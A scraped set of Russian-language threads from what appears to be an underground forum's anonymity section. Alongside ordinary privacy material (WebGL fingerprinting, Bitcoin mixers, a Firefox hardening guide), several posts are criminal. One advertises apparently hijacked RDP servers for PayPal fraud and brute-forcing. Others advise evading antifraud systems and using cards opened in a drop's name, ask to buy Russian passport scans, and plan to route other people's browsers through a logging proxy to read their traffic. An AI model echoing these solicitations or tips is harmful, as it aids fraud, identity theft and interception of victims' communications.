Есть только два подводных камня:
1. При аппаратном реальном графическом ускорении эти параметры являются комплексом и не могут меняться по отдельности.
2. Иногда полезно заглянуть в статистику уникальности параметров которые мы устанавливаем:
https://webglstats.com/webgl/parameter/MAX_VERTEX_UNIFORM_VECTORS

А теперь давайте подведем итог:
1. Реального ускорения нет
2. Параметры не зависят ни от видеокарты, ни от друг друга
3. Комбинации параметров не защищают, а уникализируют пользователя
4. Из нескольких сотен параметров меняем всего 20

Все? Еще не все, дело в том что основа этого программного ускорения – SwiftShader может еще и тупо слить о нас инфу т.к. имеет ряд уязвимостей:
[https://www.cisecurity.org/advisory...-allow-for-arbitrary-code- execution_2018-084/](https://www.cisecurity.org/advisory/multiple- vulnerabilities-in-google-chrome-could-allow-for-arbitrary-code- execution_2018-084/)

Ну и напоследок о программном ускорении:

У WebGL используются небольшие макросы, которые более известны как extensions. Вот их лист:
https://www.khronos.org/registry/webgl/extensions/
Эти макросы отвечают за множественные графические операции и их работа напрямую зависит от ускорителя и ВСЕГДА ОТЛИЧАЕТСЯ между программным и аппаратным ускорением. И вы, поменяв название своей видеокарты, тупо спалитесь на этом, ибо определить использование программного ускорителя можно и по этим макросам.

А что если ваш антидетект использует Аппаратное ускорение и все данные берет с реальной видеокарты?

Если в вашем браузерном антидетекте используется аппаратное ускорение – тогда у вас все круто, все за исключением того, что обработка графики принудительно может быть проведена не в браузере с привлечением ресурсов видеокарты, а внутри самой видеокарты и не просто внутри а еще и в режиме ядра.

Для подкрепления фактами, рекомендую ознакомиться с исследованиями одной из топовых компаний в сфере ИБ:
<https://www.contextis.com/en/blog/webgl-a-new-dimension-for-browser- exploitation>

Ну и любители техники Apple должны понимать угрозу:
https://nvd.nist.gov/vuln/detail/CVE-2018-12152
Подробно:
http://www.cs.ucr.edu/~zhiyunq/pub/ccs18_gpu_side_channel.pdf

Ну и немного уязвимостей прямо из ГосДепа США:
https://www.us-cert.gov/ncas/bulletins/SB18-323
https://nvd.nist.gov/vuln/search/re...lts_type=overview&query=webgl&search_type=all

А знаете к чему это приведет?

А приведет это к тому, что все ваши псевдоизменения отпечатков будут видны как на ладони и РЕАЛЬНЫЕ параметры вашей видеокарты могут быть прочитаны и скомпрометированы, а соответственно БУДУТ ВИДНЫ ваши РЕАЛЬНЫЕ ОТПЕЧАТКИ.

А если видны ваши реальные отпечатки, это значит что системы антифрода вас видят, а спецслужбы могут отследить вашу активность.

Может быть выпустят обновления антидетектов и все будет ок?

Шансы что так произойдет стремятся к нулю т.к. уязвимости описанные выше затрагивают не только браузер, но и технологию WebGL/OpenGL ES ну и конечно драйвера вашей реальной видеокарты и фиксить это никто не будет.

Использование браузерных антидетектов создает не только трудности с эмуляцией реальной личности, но и тупо опасно для людей, чья деятельность может идти в размер с местным законодательством (если вы постите вконтакте мемчики).

(c) вектор

Криптопастбины (cryptopaste)

ID: 676533bbb4103b69df371d98
Thread ID: 26300
Created: 2018-10-11T10:11:18+0000
Last Post: 2018-10-16T13:17:15+0000
Author: tabac
Replies: 4 Views: 2K

Посоветуйте безопасные криптопастбины (cryptopaste)
словил себя на мысле, что хватит заливать инфы на обычный пастбин
пока нашел только https://cryptobin.co, но он не очень впечатлил

Деанон пользователей Bitcoin

ID: 676533bbb4103b69df371d99
Thread ID: 26330
Created: 2018-10-16T10:02:23+0000
Last Post: 2018-10-16T10:02:23+0000
Author: xrahitel
Replies: 0 Views: 2K

С момента появления первой криптовалюты у многих людей выработалось мнение, что использование Bitcoin обеспечит полную анонимность платежей и не позволит никому узнать истинного отправителя «золотых монеток». Но так ли это? И да, и нет.

Использование Bitcoin «в лоб», без вникания в суть работы сети и механики распростанения транзакции, может привести к полной деанонимизаци юзера. Читающим эту статью следует внимательно отнестись к каждому из рассматриваемых ниже пунктов и тогда вы сможете быть уверенными, что если следовать определенным несложным правилам, то третьим лицам будет крайне сложно установить вашу личность при совершении транзакций в сети Bitcoin.

Проблема IP

Наверное, самый легкий способ выявления отправителя транзакции – это сопоставление биткоин-адреса или ID транзакции c IP. Задача его сокрытия может показаться несложной, но тут всё зависит от того, какую степень анонимности вы хотите достичь. Например, по некоторым данным, более половины пользователей ТОР без труда деанонимизируются только лишь на основе информации, перехваченной с выходной ноды.

Кроме того, существует возможность связывания выявленного IP и MAC-адреса компьютера, с которого совершались транзакции. То есть, если даже вы отправляете монетки с разных адресов кошелька, то вас все равно надежно идентифицируют. Даже если при этом вы находитесь за NAT, это не поможет.
Выход – использование виртуальной машины с установленным на ней кошельком Electrum, а не официальным botcoin-core. Плюс взаимодействие с внешним миром только через грамотно настроенный vpn .

Bitcoin-миксеры и связаная с ними головная боль

Так как все транзакции в сети Bitcoin прозрачны и любой желающий может проследить, на какой адрес был произведен платеж, то возникает необходимость оборвать эту цепочку, которая связывает адреса отправителя и получателя. Наверное, первое, о чем подумает пользователь, который хочет сделать анонимную транзакцию — это прогнать свои монетки через так называемый миксер.

Если вкратце, то именно биткоин миксер позволяет «отбелить» средства и оборвать связь между двумя адресами, смешав ваши биткоины с массой других. На выходе получаются монетки, которые были отправлены со случайного адреса, который никак не связан с изначальным адресом. Все было бы хорошо, если бы не одно «но» — информация о вашем истинном лице хранится на сервере миксера, и при сильном желании она может попасть не в те руки.

Проблема №1 – логи биткоин миксеров

Казалось бы, какие логи, Карл? Если на сайте миксера английским по белому написано “No logs at all”. Но все мы прекрасно понимаем, что эта фраза про отсутствие логов не значит ровным счетом ничего, надеяться на их отсутствие – это утешать самого себя.

По факту, единственный способ удостовериться в отсутствии логов – это получить полный доступ к серверам и базам данных миксера, и собственноручно все просмотреть. Но, сами понимаете, такой вариант для обычного пользователя из разряда фантастики. А вот как раз спецслужбы или другие уполномоченные организации\лица вполне могут осуществить это, к примеру, надавив на владельца биткоин миксера.

Уж ему-то подставлять свой зад совсем не захочется ради ваших пары биткоинов, и с огромной долей вероятности логи будут слиты несколькими кликами мышки, что приведет к полнейшему деанону ваших транзакций.

Проблема №2 – корреляция транзакций

Второй момент, который может деанонимизировать пользователя биткоин миксера – это сопоставление всех транзакций в сети, который отвечают определенным параметрам.

К примеру, товарищ Х отправил 1 BTC на адрес биткоин миксера, через какое-то время на указанный товарищем Х адрес прилетает примерно 1 BTC, который уже никак не связан с адресом товарища Х. Но если мы откроем тот же blockchain.info, то сможем просмотреть информацию о всех транзакциях за последнее время, которые отвечают заданным фильтрам. То есть никто не мешает найти все адреса, с которых было отправлено порядка 1 BTC, и очень сильно сузить круг подозреваемых.

А уж если знать комиссию биткоин миксера, то и вовсе можно высчитать точное количество биткоинов, которые должны получиться на выходе. Все, что остается – это найти все адреса, с которого была отправлена данная сумма (исключая адреса биткоин миксера, конечно). Но современные миксеры позволяют задать временную задержку и собственноручно выставленную комиссию, а также возможность указать несколько адресов приема «чистых» биткоинов, что может сильно затруднить процесс деанонимизации.

Вывод – миксер не дает абсолютных гарантий анонимности, но хорош при использовании совместно с другими методами, которые мы рассмотрим ниже.

Анонимность при покупке биткоинов – миф или реальность?

Так как Bitcoin пока еще не захватил мир, то для приобретения монеток приходится платить вполне себе реальными деньгами. В большинстве случаев люди покупают биткоины через биржу либо различные обменники, расплачиваясь кредитной картой либо с помощью электронных денег, что само по себе может свести на нет все попытки сохранить инкогнито.

Конечно, кредитку можно оформить на дропа, а электронный кошелек завести на несуществующего человека, но если уж за вами начали гоняться спецслужбы, то вряд ли это будет для них сильной преградой.

Естественно, простым пользователям никак не узнать, ведет ли логи биржа или обменник, но с огромной долей вероятности ответ будет положительный. И если случится официальный запрос со стороны спецслужб на предоставление логов, то эти данные будут беспощадно слиты.

Что же делать?

Единственным «непробиваемым» вариантом в таком случае будет покупка биткоинов за наличные. Продавец не знает вас, вы не знаете продавца – идеальная схема, без участия кредиток и интернета, который, как известно, помнит все.

Есть множество сервисов, которые позволяют найти продавца биткоинов в нужном регионе, а также целая масса локальных сайтов\форумов, где можно найти нужных продавцов. То же самое касается и продажи биткоинов – найти нужного покупателя не составит особого труда. Но личные встречи могут подойти далеко не всем, по понятным причинам.

Подводные камни онлайн кошельков

Проблемой онлайн кошельков, ровно как и проблемой миксеров, является доверие своих данных и средств конкретно одному человеку или компании, что совсем противоречит идеи децентрализации. При использовании онлайн кошелька, владельцы этого сервиса могут при необходимости предоставить IP захода в кошелек, а как максимум вообще изъять ваши средства.

В заключение хотелось бы сказать, что хоть биткоин и флагман, но на текущий момент он технологически безнадежно отстал. Как средство для хранения ваших сбережений в виде «цифрового золота» он подходит, а для совершения частых и анонимных платежей – не совсем.

Сейчас есть гораздо более удобные в пользовании криптовалюты, дающие несравнимо более высокую степень анонимности платежей и защищенности транзакций. Но это тема для другого разговора посмотреть информацию о транзакции биткоин тыц

© copyright

Продажа выделенных серверов ( дедики ) USA GB DE

ID: 676533bbb4103b69df371d9a
Thread ID: 26318
Created: 2018-10-14T06:44:47+0000
Last Post: 2018-10-14T14:52:25+0000
Author: dedicrdp.ru
Replies: 1 Views: 2K

Дорогие Форумчане!
Хочу предоставить сервис по продажу серверов ( в народе говорят ДЕДИКИ )
На этом форуме только не давно, но мы уже себя показали только с лучшей стороны других форумах.

Всегда есть дедики для:

Poker
Adwords
Dating
Пайпал
ШтатОбласть
Для брута 10-30-50мбит (speedtest.net)
И остальных задач.

OS
2008
2012
Win7
старых ОС 2000,2003,XP - нету

Условия работы:

- Гарант приветствуется за ваш счет
- Дедик только в одни руки
- Обновление происходит каждый день
- Постоянным клиентам хорошие скидки

Гарантии на товар

- Гарантия на дедики - 1 час с момента покупки,гарантия распространяется только если к дедку нет подключения! Если вашу учетную запись удалили, закрыли, поменяли пароль, установили локер - это не гарантийный случай,и в нем никаких замен и возврат средств нет! Замена только товара.

Правила работы

1. Продавая вам дедик,он гарантировано будет с рабочим интернетом.
2. Не занимаюсь настраиванием стороннего софта,русифицированием серверов,и прочих,не относящихся ко мне задач !
Важно!!!
Если вам нужен дедик "без блеков" или "быстрый" или "с хорошим железом", это нужно обговаривать заранее!!! Если вы купли дедик под пайпал,не сказав о том что вам нужен дедик без блеков,это ваша проблема,и замены в таком случае не будет!
и не все товар в магазине, пишите в личку!

Ссылка на шоп - http://dedicrdp.ru

ICQ- 714363650
Telegramm - @rdpSUPPORT (https://t.me/rdpSUPPORT)
jabber - saller@jabber.cz

Бесплатные раздачи на нашем телеграмм канале - https://t.me/dedicrdp_ru

Друзья, у нас хорошая новость для вас.
+ Добавили оплату через сервис Free-Kassa ( теперь есть все криптовалюты для оплаты, и есть также вмр, вмз )
+ Добавлен ТЕЛЕГРАММ https://t.me/dedicrdp_ru канал где проходят раздачи !
+ Ну и как всегда обновления и добавлено много других стран

Бесплатный VPS от Amazon

ID: 676533bbb4103b69df371da2
Thread ID: 25824
Created: 2015-04-27T08:03:13+0000
Last Post: 2015-07-04T20:54:52+0000
Author: krest
Replies: 8 Views: 2K

День добрый.

Может это и не новость, но все-таки, надеюсь, что кому-то это будет полезным.
И так для любителей халявы и не только есть возможность получить VPS от Amazon на год бесплатно

Для этого необходимо следующее:
1. Регистрируемся тут
2. Заходим в свою учетную запись и заказываем EC2

3. Ждем активации

Вот и все

З.Ы. При заказе EC2 необходимо будет ввести данные карты. С нее ничего не снимается или может снять 1$ для проверки карты, эту сумму в течении месяца возвращают обратно.

Firefox: Настройка безопасности и анонимности

ID: 676533bbb4103b69df371da3
Thread ID: 25826
Created: 2015-04-28T09:52:04+0000
Last Post: 2015-04-28T09:52:04+0000
Author: krest
Replies: 0 Views: 2K

День добрый.

В данной статье рассмотрены внутренние настройки браузера Firefox, на которые необходимо обратить внимание тем, кому не безразлична их безопасность и анонимность.
Надеюсь, что эта статья будет полезной не только для новичков, но и более опытные пользователи найдут что-то полезное для себя.

Доступ к внутренним настройкам (набираем в строке браузера): about:config
Безопасность

javascript.enabled = false (глобальный запрет исполнения скриптов)

Если скрипты используются, то меняем:
dom.allow_scripts_to_close_windows = false (запретить скриптам зарывать окна)
dom.disable_window_flip = true (запрети скриптам разворачивать/скрывать окна)
dom.disable_window_move_resize = true (запретить скриптам менять размер/перемещать окна)
dom.disable_window_open_feature.close = true (запретить скрипам отключать кнопку закрытия окна)
dom.disable_window_open_feature.location = true (запретить скриптам скрывать адресную строку)
dom.disable_window_open_feature.menubar = true (запретить скриптам скрывать панель меню)
dom.disable_window_open_feature.minimizable = true (запретить скриптам скрывать кнопку минимизации окна)
dom.disable_window_open_feature.resizable = true (запретить скриптам изменять размер окна)
dom.disable_window_open_feature.scrollbars = true (запретить скриптам изменять скрывать полосы прокрутки)
dom.disable_window_open_feature.status = true (запретить скриптам изменять скрывать панель состояния)

network.cookie.cookieBehavior = 2 (отключить глобально прием cookies (в том числе - со сторонних сайтов))
network.cookie.cookieBehavior = 1 (прием cookies только с посещаемых сайтов)(не рекомендуется!)
Если ипользуем значение "1" (принимать cookies только с посещаемых сайтов), то необходимо включить опцию очистки cookies при закрытии браузера:
network.cookie.lifetimePolicy = 2

Подмена user-agent (UA) - сведения о вашем браузере и ОС. Правый клик на текстовом поле -> "Создать" -> "Строка":
general.useragent.override = (пустое значение)
или
general.useragent.override = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
Другие значения UA можно посмотреть тут

general.useragent.locale = en (изменяем локализацию браузера, в нашем случае на англ.)
Локализация должна быть аналогичной как установлено в general.useragent.override

network.http.sendRefererHeader = 0 (глобальное отключение отсылки рефереров)
или
network.http.sendRefererHeader = 1 (отсылка рефереров только при нажатии на ссылку, но не на графику)

network.http.sendSecureXSiteReferrer = false (отключить отсылку рефереров с https на http сайт)

browser.safebrowsing.enabled = false (отключение защиты от фишинга (в целях предотвращения отсылки адресов посещаемых сайтов для анализа в Google))

browser.safebrowsing.malware.enabled = false (отключение защиты от зараженных сайтов)

browser.search.suggest.enabled = false (Отключение автоподстановки при поиске (автоматической передачи текста, набираемого в окне поиска, на поисковый сайт - без явного подтверждения со стороны пользователя))

signon.rememberSignons = false (запрет хранения паролей)
services.sync.prefs.sync.signon.rememberSignons = false(для отключения синхронизации при помощи Sync)

network.dns.disablePrefetch = true(запретить предварительный запрос DNS для всех ссылок на активной странице)

network.dns.disablePrefetchFromHTTPS = true (запретить предварительный запрос DNS для всех ссылок на активной https странице)

network.prefetch-next = false (отключить предварительную загрузку страницы, которую сайт считает логически последующей)

network.proxy.socks_remote_dns = true (отправлять DNS-запросы через прокси (при использовании прокси))

network.dns.disableIPv6 = true (отключаем IPv6 DNS запросы)

browser.send_pings = false (запретить отправлять уведомления о нажатии ссылки адресам, указанным в атрибуте "ping" тега )

dom.network.enabled = false (отключение определения параметров соединения пользователя с сетью, напр. Wi-Fi, LAN и др.)
**
Отключить отправку информации о видеоподсистеме:
webgl.disable-extensions = true
webgl.min_capability_mode = true

Отключить WebGL (рекомендуется при торможениях и проблемах с видеокартой):
webgl.disable-extensions = true
webgl.disabled = true

dom.battery.enabled = false (отключить отслеживание состояния аккумуляторной батареи)

device.sensors.enabled = false (отключить сбор информации с сенсоров)

dom.storage.enabled = false (отключить хранилище DOM)

network.seer.enabled = false (отключение seer, механизм отслеживающий и хранящий в базе данных запросы на загрузку при посещении страницы)

network.seer.max-db-size = 0(отключение (обнуление) базы данных seer)

media.peerconnection.enabled = false (отключение протокола WebRTC, позволяющего скрытно определять IP-адреса в локальной сети)

network.proxy.no_proxies_on =(значение отсутствует) (запретить обращения сайтов к локальной машине с целью определения открытых портов)
Возможно возникновение ошибок при обращении по адресу 127.0.0.1:port)

gfx.downloadable_fonts.enabled = false (отключить загрузку сторонних шрифтов)

plugins.click_to_play = true (запуск мультимедийного содержимого страницы (при помощи плагинов) только после подтверждения пользователя)

media.autoplay.enabled = false (отключение автопроигрывания мультимедийного содержимого)

Отключение медиакодеков:
media.ogg.enabled = false
media.opus.enabled = false
media.raw.enabled = false
media.wave.enabled = false
media.webm.enabled = false
media.webvtt.enabled = false

pdfjs.disabled = true (отключение просмотра PDF-документов средствами браузера)

permissions.default.image = 2(отключение загрузки изображений)
или
permissions.default.image = 3 (позволяет загружать изображения только с посещаемого сервера)

image.animation_mode = none (отключение проигрывания gif-анимации)

Отключение отображения и хранения фавиконов (иконок сайта):
browser.chrome.site_icons = false
browser.chrome.favicons = false

dom.ipc.plugins.flash.subprocess.crashreporter.enabled = false (отключить сообщений о сбое plugin-container, обеспечивающего работу флэш-плейера)

toolkit.telemetry.server =http://localhost/NOT-EXIST/ (блокировка адреса сервера производительности (телеметрии) Mozilla)

Отключить сервисы отсылки информации о производительности (телеметрии) браузера:
datareporting.healthreport.service.firstRun = false
datareporting.healthreport.service.enabled = false
datareporting.healthreport.uploadEnabled = false

Чтобы отключить отсылку сведений о падениях браузера необходимо найти и отредактировать файл crashreporter.ini. В Linux файл находится в ~/.mozilla/firefox/Crash Reports в Windows в корне директориии куда установлен браузер.

Code:Copy to clipboard

[Crash Reporter] SubmitReport=0

dom.enable_performance = false (отключить пересылку на сервер времени сведений о производительности - начале и окончании загрузки страницы (по интервалу можно определить использование прокси-сервера или сети TOR))

browser.sessionstore.max_tabs_undo = 0 (ограничение на хранение количества закрытых вкладок и возможности их восстановления в пределах одной сессии)

browser.sessionstore.max_windows_undo = 0 (ограничение на хранение сведений о недавно закрытых окнах в пределах одной сессии)

browser.sessionstore.resume_session_once = false (отключение автоматического хранения сведений об активной сессии и возможности ее восстановления при сбоях/перезагрузках/обновлениях)

browser.sessionstore.resume_from_crash = false (отключение возможности восстановления активной сессии в случае падения браузера)

places.history.enabled = false (отключение хранения истории посещений и загрузок)

Отключение хранения истории поиска и данных форм, вводимых на страницах:
browser.formfill.enable = false
browser.formfill.expire_days = 0

signon.autofillForms = false (отключить возможность автоматического ввода логина/пароля в формы на страницах)

browser.sessionhistory.max_entries = 5 (ограничение количества шагов при возврате назад ("стрелка влево"))

browser.sessionstore.max_resumed_crashes = 0 (ограничение количества крахов браузера, после которых будет показана страница "about:sessionrestore")

browser.cache.disk.smart_size.enabled = false (отключение автоматического управления дисковым кэшем)

browser.cache.disk.capacity = 0 (отключение дискового кэша, хранящегося на винчестере)
Примечание: данную опцию включать вместе с:
browser.cache.disk.smart_size.enabled = false

Отключение кэширования данных на диск (в том числе - и поступающих по защищенным соединениям)
network.http.use-cache = false
browser.cache.disk.enable = false
browser.cache.disk_cache_ssl = false

browser.cache.offline.enable = false (отключение создания кэша для просмотра страниц в офлайне)

Отключение создания скриншотов посещенных страниц (thumbnails):
Для этого необходимо создать две новых строки (правый клик на текстовом поле -> "Создать" -> "Логическое"):
browser.pagethumbnails.capturing_disabled = true
pageThumbs.enabled = false

geo.enabled = false(отключение геолокации)

privacy.donottrackheader.enabled = false (отключение опции "Do Not Track")

privacy.sanitize.sanitizeOnShutdown = true (очистка истории, сессий, паролей, кэша, cookies и др. при выходе из браузера)

и еще дополнительные настройки очистки):
privacy.clearOnShutdown.cache = true
privacy.clearOnShutdown.cookies = true
privacy.clearOnShutdown.downloads = true
privacy.clearOnShutdown.formdata = true
privacy.clearOnShutdown.history = true
privacy.clearOnShutdown.offlineApps = true
privacy.clearOnShutdown.passwords = true
privacy.clearOnShutdown.sessions = true
privacy.clearOnShutdown.siteSettings = true
privacy.clearOnShutdown.sessions = true

Другие полезные настройки

browser.cache.memory.enable = true (разрешаем хранить кэш в оперативной памяти)
browser.cache.memory.capacity = -1 ("минус один) - автоматическое определение (рекомендуется) (количество оперативной памяти, выделяемой под кэш)
Возможные значения:
0 - оперативная память не используется (не рекомендуется; см. примечание ниже);
n (целое цифровое значение) - количество килобайт, выделенных на кэш.
Предыдущая опция требует
browser.cache.memory.enable = true
Примечание: одновременный запрет (установка значения "0") на хранение кэша как в оперативной памяти, так и на винчестере может привести к проблемам.

Установка адреса стартовой страницы:
browser.startup.homepage = about:blank (рекомендуется)
Допустимые значения:
about:newtab - часто посещаемые сайты (не рекомендуется);
about:home - стартовая страница (она же домашняя страница по умолчанию);
http://site.com - указание на конкретный сайт;
file:///file.name - указание на локальный файл в форматах txt, htm(l)

browser.urlbar.clickSelectsAll = true (автоматическое выделение всей адресной строки при установке в нее курсора (работает в Linux))

browser.urlbar.formatting.enabled = false (отключить выделение доменного имени в адресной строке)

app.update.auto = false (отключение автоматического обновления (пользователь будет уведомлен))

browser.search.update = false (отключение автоматического обновления поисковых плагинов)

extensions.update.enabled = false (отключение поиска обновлений для установленных в браузере дополнений)

lightweightThemes.update.enabled = false (отключение обновления тем браузера)

browser.urlbar.maxRichResults = 0 (отключение выпадающего под адресной строкой списка с ранее посещенными сайтами, при ручном наборе URL)

browser.urlbar.autocomplete.enabled = false (отключение автодополнения данных из истории и закладок)

browser.bookmarks.max_backups = 1 (установка количества резервных копий закладок браузера)

Включение и определение количества паралельных запросов (в том числе - при использовании прокси и защищенного ssl-соединения):
network.http.pipelining = true
network.http.pipelining.ssl = false
network.http.proxy.pipelining = true
network.http.pipelining.maxrequests = 32 (по умолчанию; не рекомендуется увеличивать это значение)

browser.tabs.closeWindowWithLastTab = false (не закрывать браузер при закрытии последней вкладки)

Поведение мыши при увеличении/уменьшении масштаба с помощью колеса прокрутки:
mousewheel.withcontrolkey.numlines = 1 (движение колесом "от себя" увеличивает масштаб просматриваемой страницы);
mousewheel.withcontrolkey.numlines = -1 ("минус один") (движение колесом "от себя" уменьшает масштаб просматриваемой страницы)

browser.tabs.insertRelatedAfterCurrent = false (расположение новых открываемых вкладок: вкладка открывается в правом конце панели вкладок)

general.smoothScroll = false (отключение плавной прокрутки, рекомендуется при торможениях, сбоях и проблемах с видеокартой)

layers.acceleration.disabled = true (отключение аппаратного ускорения, при торможениях, сбоях и проблемах с видеокартой)

plugins.SPOILERMissingPluginsNotification = false (отключение запроса "Вы хотите установить плагин, нужный для отображения этой страницы?")

Отключение анимации:
browser.fullscreen.animateUp = 0
browser.tabs.animate = false
alerts.disableSlidingEffect = true

В дополнение еще несколько полезных ссылок по теме:
Файл hosts, блокирующий баннерные и рекламные сайты:

Аддоны:
NoScipt
AdBlockPlus
BetterPrivacy
ClickClean
Ghostery

Для изменения/подмены UA можно установить User Agent Switcher
Тут можно скачать большой список значений UA для импорта в User Agent Switcher.
Список настроек about:config на русском языке с пояснениями тут

Truecrypt - сомнения....

ID: 676533bbb4103b69df371daa
Thread ID: 24752
Created: 2013-10-27T22:02:33+0000
Last Post: 2013-10-28T13:06:33+0000
Author: TrueMind
Replies: 5 Views: 2K

www.opennet.ru/opennews/art.shtml?num=38202

стоит задуматься...

Вопросец по жаберу

ID: 676533bbb4103b69df371daf
Thread ID: 24452
Created: 2013-07-25T09:03:42+0000
Last Post: 2013-08-12T09:51:55+0000
Author: demien
Replies: 11 Views: 2K

Интересует сабжевые сервера, которые не ведут логов, стабильные.
И как следствие вопрос, как более тактично перенести контакты со старого жаба на новый?
Спам?

Личная выходная нода тора!

ID: 676533bbb4103b69df371db1
Thread ID: 24297
Created: 2013-06-12T07:22:08+0000
Last Post: 2013-08-08T01:29:51+0000
Author: rezvey
Replies: 4 Views: 2K

Привет всем, никто не подскажет, хочу поднять личную выходную ноду тора. По понятным причинам, не хочу, чтобы ей кто-либо пользовался кроме меня.
Вопрос в том, как ограничить доступ к ней?
ExitPolicy не вариант, т.к. неизвестно с каких промежуточных нод я буду попадать на свою.

Заранее спасибо всем отписавшимся

VPN на дедах

ID: 676533bbb4103b69df371dbb
Thread ID: 22304
Created: 2011-10-18T12:18:28+0000
Last Post: 2011-10-20T15:11:40+0000
Author: robert112
Replies: 2 Views: 2K

Задался вопросом как бы полезнее юзать свои деды. На продажу за копейки выставлять не вариант, да и не мой это биз.
Понаставил соксов, очень хорошо работают и долго.
Теперь вот думаю может ВПН там развернуть.

Подскажите какой софт нужен чтобы на виндах поднять впн?
причем желательно такой чтобы без палева))

Aнонимность майла

ID: 676533bbb4103b69df371dbc
Thread ID: 20991
Created: 2011-01-17T12:59:37+0000
Last Post: 2011-01-23T20:02:39+0000
Author: kururugi
Replies: 2 Views: 2K

Скажите пожалуйста каким публичным майл сервером исползоваться?

Сегодня я ползуюс gmail.com но думаю что когда кое лубо американское агенство захочет, оно сможет получить доступ до моего мейла без всяких проблем.

По этому ищу другую возможность. Но боюс что во всякие другие сервер очень несложно вламться хакером, или что самие администраторы когда то помогут своим "друзям" полугить доступ до любого емайла.

Посоветуйте, есть какой то другой пути, чем подставит себе собственный майл сервер?

Спасибо

Сузаку

Настройка Outpost

ID: 676533bbb4103b69df371dbe
Thread ID: 20897
Created: 2011-01-01T22:31:12+0000
Last Post: 2011-01-01T22:31:12+0000
Author: LuxMarkiz
Replies: 0 Views: 2K

Подскажите, как правильно настроить Outpost, чтобы при включенном java-script сайты (на которых нельзя работать без java-script) не палили мой реальный IP?

куплю снг соксы

ID: 676533bbb4103b69df371dbf
Thread ID: 20669
Created: 2010-11-26T00:22:07+0000
Last Post: 2010-11-26T06:43:32+0000
Author: antpri
Replies: 1 Views: 2K

куплю снг соксы по моей маске дорого, или кто нибудь подскажите сервис плз.
413898626

Куплю скан паспорта РФ

ID: 676533bbb4103b69df371dc1
Thread ID: 20307
Created: 2010-09-23T14:46:26+0000
Last Post: 2010-10-24T14:26:41+0000
Author: SerpentRider
Replies: 1 Views: 2K

Куплю скан паспорта РФ

Нужен скан всех страниц (2,3,5,19)

ася 423-999-259

"Альтернатива"))

ID: 676533bbb4103b69df371dc6
Thread ID: 19349
Created: 2010-04-28T16:10:28+0000
Last Post: 2010-04-30T09:36:43+0000
Author: Chococream
Replies: 2 Views: 2K

Spoiler: 8

Всем привет, сейчас что-то навеяло впнами...
Раньше использовал паблик сервисы, затем перешёл на свой собственный впн.
Но, всё равно с точки зрения безопасности - как по мне - не очень, ибо даже с шифрацией траффика понятно, кто на сервер лезет.
Причём ладно ты вроде клинишь айпи, логи, но никто не даёт гарантию, что физически не установлено никаких "снифферов".
С паблик сервисами всё сложнее - наглядно не поймёшь куда, кто ходит, ибо клиентов несколько.
Я всё к чему клоню... серверы-серверами, а я вот думаю сделать сокс-сервер с шифрацией траффика криптостойким алгоритмом.
Видел такую реализацию в "Барракуда" боте, в принципе схема обмена данными достаточно проста, но мб до меня в опенсорсе есть какие-либо исходники ? Если таковых нет, придётся брать базовый сокс5 сервер и переписывать под себя, клиент получается тоже будет самодельный.
Сам считаю, что плюсов в таком боте будет много: начиная от шифрации траффика, заканчивая "одноразовостью" использования.
Мб у кого-какие советы будут или дельные предложения, проект я по-любому буду развивать.

Proxy-hosting

ID: 676533bbb4103b69df371dc7
Thread ID: 19003
Created: 2010-02-09T18:23:19+0000
Last Post: 2010-02-17T16:20:18+0000
Author: eshkinkot
Replies: 2 Views: 2K

Я могу удаленно менять настройки браузера. Хочу прописать в браузере прокси- сервер через который пользователь будет выходить в Интернет. А я буду читать логи сервера. Кто-нибудь знает либо скрипты для организации прокси-сервера, либо бесплатные прокси-хостинги с возможностью логирования.

CGIPROXY with JavaScript support

ID: 676533bbb4103b69df371dc8
Thread ID: 18864
Created: 2010-01-18T10:04:55+0000
Last Post: 2010-01-18T10:08:19+0000
Author: fdp
Replies: 1 Views: 2K

Всем привет!

Акромя proxy.ersca.com кто-нибудь знает живые проксирующие жабу ресурсы?

Unix http proxy

ID: 676533bbb4103b69df371dcb
Thread ID: 18225
Created: 2009-08-30T16:18:53+0000
Last Post: 2009-09-01T08:04:05+0000
Author: Zer0
Replies: 4 Views: 2K

Подскажите какойнить http proxy под unix желаетльно одинм файлом или в виде скрипта например на прел или скажите как сделатть чтоб bouncer начал рабботать с хттп а не socks5 =)
Зарание спаибо прокси от заразы не предлогать =)

Небольшую тонкость сканировании проксей

ID: 676533bbb4103b69df371dce
Thread ID: 17693
Created: 2009-06-03T10:19:09+0000
Last Post: 2009-06-03T10:19:09+0000
Author: ATLZ
Replies: 0 Views: 2K

Раскажу про небольшую тонкость, которую лучше соблюдать при сканировании проксей - как известно, многие организации где стоят прокси, сильно обижаются, если кто-то ими пользуется. То есть можно словить абуз на ровном месте, не из- за спама, а из-за использования прокси. Чтобы избежать этого, прогоняйте адреса проксей перед проверкой через вот этот список: http://www.bluetack.co.uk/config/level1.gz.gz Это как раз список “вредных” организаций, он довольно большой, там от ЦРУ и американской армии до всяких российских институтов и т.п. Список постоянно обновляется, так что нужно периодически выкачивать новую версию.
Также http://naawy.com/proxy-checker.php.Сервис с поможью помощью него можно узнать о том, какая информация доступна о тебе посещаемыми серверами. Проверь насколько надежен твой прокси-сервер.<http://www.proxy-forum.org/cgi- bin/checkanon.cgi>

Короткий дефис в нике

ID: 676533bbb4103b69df371dd1
Thread ID: 17546
Created: 2009-05-11T22:34:41+0000
Last Post: 2009-05-11T22:34:41+0000
Author: XSSBot
Prefix: Видео
Replies: 0 Views: 2K

Обсуждение видеоhttp://xss.is/?act=video#video22[
Автор: Silveran
Дата добавления: 28.10.2006 01:58
При использовании короткого дефиса, ник на форуме становится невидимым. На примере - веб хак.
Видео позаимствовано из архива antichat.ru

[url=http://xss.is/video/19.jpg]Скриншот](http://xss.is/?act=video#video22)
[a style='color:#309030 !important' href='http://dllfiles.org/video/19.rar' target='_blank']Скачать | Download[/url] (1.18 Mb)

Подскажите есть ли такое

ID: 676533bbb4103b69df371dd4
Thread ID: 17392
Created: 2009-04-18T05:01:20+0000
Last Post: 2009-04-18T12:22:08+0000
Author: Trinux
Replies: 3 Views: 2K

Есть ли такая прога чтобы все преложения на компе проходили через проксик? и как называется? =)

нужен прокси сервер

ID: 676533bbb4103b69df371dd6
Thread ID: 17332
Created: 2009-04-07T16:46:31+0000
Last Post: 2009-04-08T09:35:37+0000
Author: Gr0m
Replies: 3 Views: 2K

Парни нужен прокси сервер с поддержкой ssl кто поделится?

Сокс4\5 сервер.

ID: 676533bbb4103b69df371dd9
Thread ID: 16323
Created: 2008-11-20T23:05:40+0000
